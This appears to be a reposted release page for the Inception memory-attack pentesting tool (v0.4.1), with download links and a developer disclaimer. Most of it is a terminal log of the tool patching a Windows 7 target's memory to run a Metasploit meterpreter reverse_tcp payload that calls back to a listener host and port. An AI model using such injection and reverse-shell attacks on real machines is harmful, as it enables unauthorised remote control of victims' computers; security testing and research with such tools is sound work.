 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.1 (C) Carsten Maartmann-Moe 2015
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

For Source & More Detail read here : http://www.breaknenter.org/projects/inception/

Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.

Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)

Master.zip | Clone Url | Our Post Before
